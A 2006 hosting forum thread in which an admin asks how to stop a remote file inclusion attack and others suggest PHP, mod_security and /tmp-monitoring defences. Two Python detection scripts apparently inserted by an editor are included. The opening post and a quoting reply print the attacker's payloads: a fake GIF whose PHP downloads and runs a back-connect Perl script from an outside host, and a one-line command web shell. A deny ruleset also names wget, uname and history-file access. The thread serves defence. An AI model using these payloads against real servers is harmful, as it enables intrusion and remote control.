Help, hacker uploading files /tmp with external PHP code

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
Hi!

A hacker is uploading shell scripts to /tmp on one server through a client's PHP script.
The way he is doing this is going to my client's index2.php file and then adding a command at the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's PHP commands in the file.
You can probably see it live by going to the URLs in the log below.

Anyway - any idea on how to stop this?
Disable a function in PHP maybe, but hopefully none that will affect other clients.
Or a mod_sec rule maybe.
I have blocked his IP of course, as well as the server the PHP commands are on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
 

claudio

Well-Known Member
Jul 31, 2004
201
0
166
Most of these files would be empty or not harmful if you disable = "system, exec" in your php.ini; also set safe mode = on (you can disable some of the safe mode individually in your httpd.conf if some customer requires it).

I wrote a small Perl script that I use as a cron job every 10 minutes looking for strange files in my /tmp.

Then by the time I can grep all .php in domlogs and then execute some of the pages in order to discover which of them is causing the file injection or jamming it in /tmp.

good luck ; )

Claudio
 

jackie46

BANNED
Jul 25, 2005
536
0
166
claudio said:
Most of these files would be empty or not harmful if you disable = "system, exec" in your php.ini; also set safe mode = on (you can disable some of the safe mode individually in your httpd.conf if some customer requires it).
Really, care to enlighten all of us as to how you would disable safe mode on an individual basis?
 

mOdY

Well-Known Member
Dec 25, 2004
80
0
156
claudio said:
Most of these files would be empty or not harmful if you disable = "system, exec" in your php.ini; also set safe mode = on (you can disable some of the safe mode individually in your httpd.conf if some customer requires it).

I wrote a small Perl script that I use as a cron job every 10 minutes looking for strange files in my /tmp.

Then by the time I can grep all .php in domlogs and then execute some of the pages in order to discover which of them is causing the file injection or jamming it in /tmp.

good luck ; )

Claudio
nice thingy, would be nice if you shared it with us. :cool:
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Get mod_security and a good ruleset, and use this code:

SecFilter "page=http"

The problem is poorly written PHP code that just fopen's a page / URL and doesn't check / use an array to grab from.
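HostMerit's diagnosis (a script that includes or fopen()s whatever URL the page parameter carries) and claudio's approach of grepping the domlogs to find which customer file is being abused can be combined into one detection step. The following is an added example, not code from the thread or from any of the posters: a Python script that parses Apache combined-format domlog lines (with or without the "domlog path:" prefix that grep adds) and reports every request whose query parameter is an absolute URL, then tallies the hits per local script. The sample log lines are constructed to mirror the excerpt in the first post; the IPs and the evil.example host are documentation values, not real ones.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line, optionally prefixed with "/path/to/domlog:" as
# grep -H prints it when several domlogs are searched at once.
LOG_RE = re.compile(
    r'^(?:(?P<file>/\S+?):)?'
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A query parameter whose value is an absolute URL is what a remote file
# inclusion attempt looks like: include($_GET['page']) would fetch and run it.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry['target'])
    entry['path'] = parts.path
    entry['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return entry


def remote_params(entry):
    """(name, value) pairs in the request whose value points at another host."""
    return [(k, v) for k, v in entry['params'] if REMOTE_URL_RE.match(v)]


def find_rfi_attempts(lines):
    """Walk log lines and report every request carrying a remote-URL parameter."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        bad = remote_params(entry)
        if bad:
            hits.append({
                'ip': entry['ip'],
                'time': entry['time'],
                'script': entry['path'],
                'status': int(entry['status']),  # 200 means the include very likely ran
                'params': bad,
            })
    return hits


def scripts_abused(hits):
    """Count hits per local script, to find which customer file is the injection point."""
    counts = {}
    for h in hits:
        counts[h['script']] = counts.get(h['script'], 0) + 1
    return counts


# Constructed sample lines modelled on the domlog excerpt in the thread.
SAMPLE_LOG = [
    '/usr/local/apache/domlogs/xxx.domain.com:203.0.113.7 - - [03/May/2006:07:07:24 +0200] '
    '"GET /index2.php?title=PageTitle&page=http://evil.example/m.gif? HTTP/1.1" 200 3478 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '/usr/local/apache/domlogs/xxx.domain.com:203.0.113.7 - - [03/May/2006:07:07:24 +0200] '
    '"GET /gfx/5x5.gif HTTP/1.1" 404 - '
    '"http://xxx.domain.com/index2.php?title=PageTitle&page=http://evil.example/m.gif?" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [03/May/2006:08:12:01 +0200] '
    '"GET /index2.php?title=Home&page=about.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/May/2006:08:15:40 +0200] '
    '"GET /gallery.php?img=ftp://evil.example/pass.gif HTTP/1.1" 200 512 "-" "curl/7.15"',
]

if __name__ == '__main__':
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(h['time'], h['ip'], h['script'], h['status'], h['params'])
    print(scripts_abused(found))
```

Run it against real domlogs with something like `grep -h 'page=http' /usr/local/apache/domlogs/* | python3 rfi_scan.py` after replacing SAMPLE_LOG with `sys.stdin`; the second sample line shows why the referer is not used as the trigger: it only records the follow-on fetch of an image from the already-included page, so counting it would double the hit for index2.php.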
 

destr0yr

Well-Known Member
May 4, 2004
58
0
156
Kelowna, BC.
Upgrading your PHP CMS/blog/forum/whatever would be the ultimate solution. index2.php looks mambo-ish. Make sure your client is running the most current version - go so far as to disable their site until they do upgrade. Security should be as large an issue for them as it is for you (IMHO).

As for mod_security, use it, love it, embrace it, be one with it.

Current ruleset that works for me:
Code:
# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"

# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"

#More PHPBB worms
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"
 

Nick A

Member
Jan 16, 2005
23
0
151
Canada
jeroman8 said:
Hi!

A hacker is uploading shell scripts to /tmp on one server through a client's PHP script.
The way he is doing this is going to my client's index2.php file and then adding a command at the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's PHP commands in the file.
You can probably see it live by going to the URLs in the log below.

Anyway - any idea on how to stop this?
Disable a function in PHP maybe, but hopefully none that will affect other clients.
Or a mod_sec rule maybe.
I have blocked his IP of course, as well as the server the PHP commands are on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
Hi, have you run /scripts/securetmp before?
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Securetmp wouldn't help, as it's running a Perl script.

You can try chmod 750 /usr/bin/wget and also chmod 750 /usr/bin/curl, as curl is being used to download the item. There are many different ways to secure against this attack.
 

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
Thanks guys for your help in this matter!

Upgrading the script is not easy since it's not a public script.
noexec/securetmp for /tmp is of course already done, but that doesn't help, never did.
I already use almost all of HostMerit's mod_sec rules, but blocking "http" will block all "good" requests also and is too much on this server since many use external images, include pages etc. with PHP. Of course security should come first, but there's a client/money issue also.
chmod 750 curl and wget is the same thing as removing the functions for the clients - many use it.

However, disabling "system" seems to fix this issue with this script!!

I also have a script checking /tmp and any other directory I like.
I set what it should look for and not look for and where, and then it emails whenever,
for example, a "hack.pl" or "bc.tar" is being created in /tmp.

You can find it and other good scripts here:
http://forums.cpanel.net/showthread.php?t=25672&highlight=PWS+monitor
 
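Both claudio's 10-minute cron job and jeroman8's monitor do the same thing: snapshot /tmp, compare with the previous run, and mail when something like "hack.pl" or "bc.tar" appears. Neither script was posted, so the following is an added example written for this thread, not either poster's code. It is a Python monitor that keeps a name -> (size, mtime) snapshot, classifies new or rewritten files by name pattern, by a shebang or PHP open tag in the first bytes, and by the executable bit, and builds the alert text a cron job would e-mail. The ignore list (PHP session and upload temp files) and the watch patterns are constructed defaults to tune per server; demo() builds a throwaway directory with constructed files that stand in for /tmp.

```python
import os
import re
import shutil
import stat
import tempfile

# Files that legitimately live in /tmp on a PHP host: session files and upload
# temp files. Constructed defaults; extend for the server in question.
IGNORE_NAME = re.compile(r'^(sess_[0-9a-zA-Z,-]+|php[0-9A-Za-z]{6})$')
# Names that look like the droppings described in the thread (Perl bots such
# as "cb" or "hack.pl", tarballs such as "bc.tar"). Constructed watch list.
SUSPICIOUS_NAME = re.compile(
    r'\.(pl|sh|php|c|tar|tgz|gz|zip)$|^(cb|bc|hack|kit|shell|bot)\b', re.I)
# Content check: an interpreter shebang or a PHP open tag in the first bytes.
SUSPICIOUS_HEAD = re.compile(rb'^#!\s*/|<\?(php|\s)')


def snapshot(directory):
    """Map name -> (size, mtime) for the regular files directly under directory."""
    snap = {}
    for name in os.listdir(directory):
        try:
            st = os.lstat(os.path.join(directory, name))
        except OSError:
            continue                      # vanished between listdir and lstat
        if stat.S_ISREG(st.st_mode):
            snap[name] = (st.st_size, int(st.st_mtime))
    return snap


def classify(directory, name):
    """Return the reasons a file looks suspicious; an empty list means benign."""
    if IGNORE_NAME.match(name):
        return []
    reasons = []
    if SUSPICIOUS_NAME.search(name):
        reasons.append('name matches watch pattern')
    path = os.path.join(directory, name)
    try:
        with open(path, 'rb') as f:
            head = f.read(256)
        mode = os.lstat(path).st_mode
    except OSError:
        return reasons
    if SUSPICIOUS_HEAD.search(head):
        reasons.append('content starts with shebang or PHP tag')
    if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        reasons.append('executable bit set')
    return reasons


def scan(directory, before):
    """One cron tick: diff against the previous snapshot and classify what is new."""
    after = snapshot(directory)
    findings = {}
    for name, meta in after.items():
        if before.get(name) != meta:      # new, or rewritten since the last tick
            reasons = classify(directory, name)
            if reasons:
                findings[name] = reasons
    return after, findings


def format_alert(directory, findings):
    """Plain-text body for the e-mail the cron job would send."""
    lines = ['Suspicious new files in %s:' % directory]
    for name in sorted(findings):
        lines.append('  %s: %s' % (name, '; '.join(findings[name])))
    return '\n'.join(lines)


def demo():
    """Constructed scenario: two ticks over a throwaway directory standing in for /tmp."""
    d = tempfile.mkdtemp()
    try:
        tick0 = snapshot(d)
        with open(os.path.join(d, 'sess_abc123'), 'w') as f:
            f.write('user|s:3:"bob";')                   # benign PHP session file
        with open(os.path.join(d, 'notes.txt'), 'w') as f:
            f.write('just text\n')                        # benign, not executable
        with open(os.path.join(d, 'hack.pl'), 'w') as f:
            f.write('#!/usr/bin/perl\nprint "x";\n')     # name and shebang match
        with open(os.path.join(d, 'cb'), 'w') as f:
            f.write('#!/usr/bin/perl\n')                  # name, shebang and mode match
        os.chmod(os.path.join(d, 'cb'), 0o755)
        tick1, findings1 = scan(d, tick0)
        tick2, findings2 = scan(d, tick1)                 # nothing new on the next tick
        return findings1, findings2
    finally:
        shutil.rmtree(d)


if __name__ == '__main__':
    first, second = demo()
    print(format_alert('/tmp (demo)', first))
    print('second tick findings:', second)
```

For real use, persist the snapshot between ticks (a JSON file under /var/lib or similar, readable only by root) and hand format_alert() to sendmail; comparing mtime as well as size catches a dropper that overwrites an existing name, which a pure "new name" check would miss.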

rogcan

Well-Known Member
Jun 7, 2004
48
0
156
How do you add that ruleset for mod_security, by the way?

Can I get a step-by-step instruction for that please, as I would like to use yours, destr0yr :)
 

ramprage

Well-Known Member
Jul 21, 2002
651
0
166
Canada
destr0yr

The ruleset destr0yr is using looks like the default for mod_security and won't help much.

You need to login by shell and have the ruleset edited then restart apache. If you have more questions about this PM me.